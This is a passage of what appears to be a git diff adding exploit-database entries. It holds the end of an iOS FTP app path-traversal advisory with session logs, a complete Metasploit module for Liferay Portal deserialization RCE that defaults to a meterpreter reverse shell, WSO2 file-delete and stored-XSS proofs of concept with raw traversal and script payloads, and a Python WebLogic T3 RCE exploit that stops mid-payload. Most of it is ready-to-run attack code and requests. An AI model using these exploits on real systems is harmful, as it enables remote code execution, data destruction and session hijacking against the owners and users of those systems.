+/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/
+3. Include the payload /(null)// and refresh via list command
+4. You are now placed in an empty folder without permission to move
+5. Add to /(null)/../ to the path and refresh the client
+6. Path traversal successful to access the main app root path (./) that
+is normally not accessable
+7. Successful reproduce of the path traversal web vulnerability!
+
+
+PoC: Payload
+/(null)// to /(null)/../
+
+
+--- PoC Sessio Logs (FTP) ---
+[21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files
+[21:52:40] [R] 221 Thank you for using the FTP service on localhost.
+[21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds)
+[21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001
+[21:52:42] [R] Connected to 192.168.2.116
+[21:52:42] [R] 220 iosFtp server ready.
+[21:52:42] [R] USER anonymous
+[21:52:42] [R] 331 Password required for (null)
+[21:52:42] [R] PASS (hidden)
+[21:52:42] [R] 230 User (null) logged in.
+[21:52:42] [R] SYST
+[21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912
+[21:52:42] [R] FEAT
+[21:52:42] [R] 211-Features supported
+[21:52:42] [R] UTF8
+[21:52:42] [R] 211 End
+[21:52:42] [R] OPTS UTF8 ON
+[21:52:42] [R] 200 Type set Opts to UTF8.
+[21:52:42] [R] PWD
+[21:52:42] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
+is the current directory.
+[21:52:42] [R] CWD /(null)/
+[21:52:42] [R] 550 CWD failed.
+[21:52:42] [R] PWD
+[21:52:42] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
+is the current directory.
+[21:52:42] [R] PASV
+[21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252)
+[21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236
+[21:52:42] [R] LIST -al
+[21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:52:42] [R] 226 Transfer complete.
+[21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s)
+[21:52:43] [R] CDUP
+[21:52:43] [R] 250 CDUP command successful.
+[21:52:43] [R] PWD
+[21:52:43] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder"
+is the current directory.
+[21:52:43] [R] PASV
+[21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51)
+[21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323
+[21:52:43] [R] LIST -al
+[21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:52:43] [R] 226 Transfer complete.
+[21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s)
+[21:52:43] [R] CDUP
+[21:52:44] [R] 250 CDUP command successful.
+[21:52:44] [R] PWD
+[21:52:44] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents"
+is the current directory.
+[21:52:44] [R] PASV
+[21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51)
+[21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707
+[21:52:44] [R] LIST -al
+[21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:52:44] [R] 226 Transfer complete.
+[21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s)
+[21:53:34] [R] CDUP
+[21:53:34] [R] 250 CDUP command successful.
+[21:53:34] [R] PWD
+[21:53:34] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45"
+is the current directory.
+[21:53:34] [R] PASV
+[21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14)
+[21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126
+[21:53:34] [R] LIST -al
+[21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:34] [R] 226 Transfer complete.
+[21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s)
+[21:53:35] [R] CDUP
+[21:53:35] [R] 250 CDUP command successful.
+[21:53:35] [R] PWD
+[21:53:35] [R] 257 "(null)" is the current directory.
+[21:53:35] [R] PASV
+[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14)
+[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718
+[21:53:35] [R] LIST -al
+[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:35] [R] 226 Transfer complete.
+[21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s)
+[21:53:35] [R] PASV
+[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14)
+[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622
+[21:53:35] [R] LIST -al
+[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:35] [R] 226 Transfer complete.
+[21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s)
+[21:53:36] [R] CDUP
+[21:53:36] [R] 550 CDUP command failed.
+[21:53:41] [R] CWD /etc
+[21:53:41] [R] 250 CWD command successful.
+[21:53:41] [R] PWD
+[21:53:41] [R] 257 "(null)" is the current directory.
+[21:53:48] [R] CDUP
+[21:53:48] [R] 550 CDUP command failed.
+[21:53:51] [R] CWD /
+[21:53:51] [R] 250 CWD command successful.
+[21:53:51] [R] PWD
+[21:53:51] [R] 257 "/" is the current directory.
+[21:53:51] [R] PASV
+[21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173)
+[21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749
+[21:53:51] [R] LIST -al
+[21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:51] [R] 226 Transfer complete.
+[21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s)
+[21:54:02] [R] TYPE I
+[21:54:02] [R] 200 Type set to I.
+
+Listing Path ./root
+- Applications
+- bin
+- cores
+- developer
+- Library
+- private
+- sbin
+- System
+- usr
+- etc
+- var
+- tmp
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/java/remote/48332.msf b/exploits/java/remote/48332.msf
new file mode 100644
index 000000000..b8e570402
--- /dev/null
+++ b/exploits/java/remote/48332.msf
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Java::HTTP::ClassLoader
+ include Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
+ 'Description' => %q{
+ This module exploits a Java unmarshalling vulnerability via JSONWS in
+ Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
+ to execute code as the Liferay user. Tested against 7.2.0 GA1.
+ },
+ 'Author' => [
+ 'Markus Wulftange', # Discovery
+ 'Thomas Etrillard', # PoC
+ 'wvu' # Module
+ ],
+ 'References' => [
+ ['CVE', '2020-7961'],
+ ['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
+ ['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'],
+ ['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271']
+ ],
+ 'DisclosureDate' => '2019-11-25', # Vendor advisory
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'java',
+ 'Arch' => ARCH_JAVA,
+ 'Privileged' => false,
+ 'Targets' => [
+ ['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ ))
+
+ register_options([
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [true, 'Base path', '/'])
+ ])
+ end
+
+ def check
+ # GET / response contains a Liferay-Portal header with version information
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path)
+ )
+
+ unless res
+ return CheckCode::Unknown('Target did not respond to check request.')
+ end
+
+ unless res.headers['Liferay-Portal']
+ return CheckCode::Unknown(
+ 'Target did not respond with Liferay-Portal header.'
+ )
+ end
+
+=begin
+ Building the Liferay-Portal header:
+ https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
+ Liferay-Portal header data:
+ https://github.com/liferay/liferay-portal/blob/master/release.properties
+
+ Example GET / response:
+ HTTP/1.1 200
+ [snip]
+ Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
+ [snip]
+=end
+ version, build = res.headers['Liferay-Portal'].scan(
+ /^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
+ ).flatten
+
+ unless version && (build = Integer(build) rescue nil)
+ return CheckCode::Detected(
+ 'Target did not respond with Liferay version and build.'
+ )
+ end
+
+ # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
+ if build < 7201
+ return CheckCode::Appears(
+ "Liferay #{version} MAY be a vulnerable version. Please verify."
+ )
+ end
+
+ CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
+ end
+
+ def exploit
+ # NOTE: Automatic check is implemented by the AutoCheck mixin
+ super
+
+ # Start our HTTP server to provide remote classloading
+ @classloader_uri = start_service
+
+ unless @classloader_uri
+ fail_with(Failure::BadConfig, 'Could not start remote classloader server')
+ end
+
+ print_good("Started remote classloader server at #{@classloader_uri}")
+
+ # Send our remote classloader gadget to the target, triggering the vuln
+ send_request_gadget(
+ normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'),
+ # Required POST parameters for /api/jsonws/expandocolumn/update-column:
+ # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
+ 'columnId' => rand(8..42), # Randomize for "evasion"
+ 'name' => rand(8..42), # Randomize for "evasion"
+ 'type' => rand(8..42) # Randomize for "evasion"
+ )
+ end
+
+ # Convenience method to send our gadget to a URI with desired POST params
+ def send_request_gadget(uri, vars_post = {})
+ print_status("Sending remote classloader gadget to #{full_uri(uri)}")
+
+ vars_post['+defaultData'] =
+ 'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'
+
+ vars_post['defaultData.userOverridesAsString'] =
+ "HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'vars_post' => vars_post
+ }, 0)
+ end
+
+ # Generate all marshalsec payloads for the Jackson marshaller:
+ # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
+ def go_go_gadget
+ # Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget:
+ # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
+ gadget = Rex::Text.decode_base64(
+ <<~EOF
+ rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
+ cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
+ bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
+ ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
+ bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
+ DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
+ aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
+ AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
+ ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
+ kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
+ EOF
+ )
+
+ # Replace length-prefixed placeholder strings with our own
+ gadget.sub!("\x00\x04HACK", packed_class_name)
+ gadget.sub!("\x00\x03THE", packed_classloader_uri)
+ gadget.sub("\x00\x06PLANET", packed_class_name)
+ end
+
+ # Convenience method to pack the classloader URI as a length-prefixed string
+ def packed_classloader_uri
+ "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/java/webapps/48313.txt b/exploits/java/webapps/48313.txt
new file mode 100644
index 000000000..7ab57c008
--- /dev/null
+++ b/exploits/java/webapps/48313.txt
@@ -0,0 +1,146 @@
+# Title: WSO2 3.1.0 - Arbitrary File Delete
+# Date: 2020-04-12
+# Author: raki ben hamouda
+# Vendor: https://apim.docs.wso2.com
+# Softwrare link: https://apim.docs.wso2.com/en/latest/
+# CVE: N/A
+
+
+Document Title:
+===============
+WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal )
+
+
+##CVE not assigned yet
+
+##Security Update : https://apim.docs.wso2.com/en/latest/
+
+
+Common Vulnerability Scoring System:
+====================================
+8.5
+
+
+Affected Product(s):
+====================
+WSO2 API Manager Carbon Interface
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product .
+The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests
+and to delete arbitrary System files.
+
+The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter
+of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files
+via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" .
+
+The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5.
+Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction.
+Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality.
+
+===============================
+
+Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...)
+
+[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
+org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d
+eployment\server\registryextensions\commons-dir
+ at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j
+ava:531) ~[axis2_1.6.1.wso2v38.jar:?]
+ at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(
+OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
+ at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO
+peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
+ at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out
+InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
+ at org.apache.axis2.client.OperationClient.execute(OperationClient.java:
+149) ~[axis2_1.6.1.wso2v38.jar:?]
+ at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem
+oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte
+nsions.stub_4.7.13.jar:?]
+ at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.
+deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens
+ions.ui_4.7.13.jar:?]
+ at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS
+ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
+ at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t
+omcat_9.0.22.wso2v1.jar:?]
+
+*Error displayed in Web browser with body request:
+
+<script type="text/javascript">
+ CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
+</script>
+
+
+
+=============================
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp
+
+Vulnerable Parameter(s):
+[+] extensionName
+
+
+Server version
+ 3.0.0
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+1-Attacker must have access to the Extension component(List ,Add ,Delete extensions )
+2-attacker uploads any file .jar extension
+3-attacker intercepts the request that follows and modifies the parameter with traversal string:
+
+--- PoC Session Logs [POST] ---
+
+POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
+Host: localhost:9443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/javascript, text/html, application/xml, text/xml, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest, XMLHttpRequest
+X-Prototype-Version: 1.5.0
+Content-type: application/x-www-form-urlencoded; charset=UTF-8
+X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
+Content-Length: 22
+Origin: https://localhost:9443
+Connection: close
+Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
+Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
+Pragma: no-cache
+Cache-Control: no-cache
+
+extensionName=../../../../INSTALL.txt
+
+ ---------------Returned Headers in Response------------------
+
+HTTP/1.1 200
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+X-Frame-Options: DENY
+Content-Type: text/html;charset=UTF-8
+Content-Length: 10
+Date: Sat, 04 Jan 2020 00:55:38 GMT
+Connection: close
+Server: WSO2 Carbon Server
\ No newline at end of file
diff --git a/exploits/java/webapps/48319.txt b/exploits/java/webapps/48319.txt
new file mode 100644
index 000000000..8aa2b6577
--- /dev/null
+++ b/exploits/java/webapps/48319.txt
@@ -0,0 +1,142 @@
+# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
+# Date: 2020-04-13
+# Author: raki ben hamouda
+# Vendor: https://apim.docs.wso2.com
+# Softwrare link: https://apim.docs.wso2.com/en/latest/
+# CVE: N/A
+# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700
+
+Technical Details & Description:
+================================
+A remote Stored Cross Site Scripting has been discovered in WSO2 API
+Manager Ressource Browser component).
+The security vulnerability allows a remote attacker With access to the
+component "Ressource Browser"
+to inject a malicious code in Add Comment Feature.
+
+The vulnerability is triggered after sending a POST request to
+`/carbon/info/comment-ajaxprocessor.jsp` with Parameter
+"comment=targeted&path=%2F".
+Remote attackers has the ablility to spread a malware,to Hijack a session
+(a session with Higher privileges), or to initiate phishing attacks.
+
+The security risk of the Stored XSS web vulnerability is estimated as
+medium with a cvss (common vulnerability scoring system) count of 5.4
+Exploitation of the Stored XSS web vulnerability requires a low privilege
+web-application user account and medium or high user interaction.
+Successful exploitation of the vulnerability results in Compromising the
+server .
+
+
+Request Method:
+[+] POST
+
+Module:
+[+] /carbon/info/comment-ajaxprocessor.jsp
+
+Parameters:
+[+] comment=admincomment
+[+] path=%2F
+=======================================
+
+POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
+Host: 192.168.149.1:9443
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/javascript, text/html, application/xml, text/xml, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
+X-Requested-With: XMLHttpRequest, XMLHttpRequest
+X-Prototype-Version: 1.5.0
+Content-type: application/x-www-form-urlencoded; charset=UTF-8
+X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
+Content-Length: 64
+Cookie: region3_registry_menu=visible; region3_metadata_menu=none;
+wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e;
+JSESSIONID=4B3AB3AA8895F2897685FA98C327D521;
+requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none;
+region4_monitor_menu=none; region5_tools_menu=none;
+current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
+Connection: close
+
+comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F
+
+
+
+
+
+==============================
+
+
+
+HTTP/1.1 200
+
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+X-Frame-Options: DENY
+vary: accept-encoding
+Content-Type: text/html;charset=UTF-8
+Content-Language: en-US
+Date: Tue, 31 Dec 2019 10:50:00 GMT
+Connection: close
+Server: WSO2 Carbon Server
+Content-Length: 3144
+
+
+//the body of response includes attacker malicious script
+
+
+<a class="closeButton icon-link registryWriteOperation"
+onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete"
+style="background-image:
+url(../admin/images/delete.gif);position:relative;float:right"> </a>
+
+
+ <iframe href=http://phishing_url>
+ <br/>
+posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker
+
+
+
+Proof of Concept (PoC):
+=======================
+
+//Let's suppose we're Attacking an admin with higher privileges
+
+
+
+1-Attacker opens his account
+
+2-add arbitrary comment
+
+
+3-intercepts the request
+
+
+4-add malicious script to the comment
+
+
+5-admin access his account,he wants to add a comment,the malicious script
+got executed
+
+
+===>Admin account compromised
+
+
+
+===============================================================================
+
+
+
+Example malicious script :
+
+
+<script>
+ alert(document.cookie);
+</script>
+
+
+
+===============================================================================
\ No newline at end of file
diff --git a/exploits/java/webapps/48320.py b/exploits/java/webapps/48320.py
new file mode 100755
index 000000000..99b9fe8af
--- /dev/null
+++ b/exploits/java/webapps/48320.py
@@ -0,0 +1,90 @@
+# Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
+# Author: nu11secur1ty
+# Date: 2020-03-31
+# Vendor: Oracle
+# Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip
+# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
+# CVE: CVE-2020-2555
+
+
+[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
+[+] Source: readme from GitHUB
+
+
+[Exploit Program Code]
+--------------------------
+
+#!/usr/bin/python
+# @nu11secur1ty
+import socket
+import os
+import sys
+import struct
+
+if len(sys.argv) < 3:
+ print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
+ sys.exit()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(5)
+
+server_address = (sys.argv[1], int(sys.argv[2]))
+print '[+] Connecting to %s port %s' % server_address
+sock.connect(server_address)
+
+# Send headers
+headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
+print 'sending "%s"' % headers
+sock.sendall(headers)
+
+data = sock.recv(1024)
+print >>sys.stderr, 'received "%s"' % data
+
+payloadObj = open(sys.argv[3],'rb').read()
+
+payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
+payload=payload+payloadObj
+payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6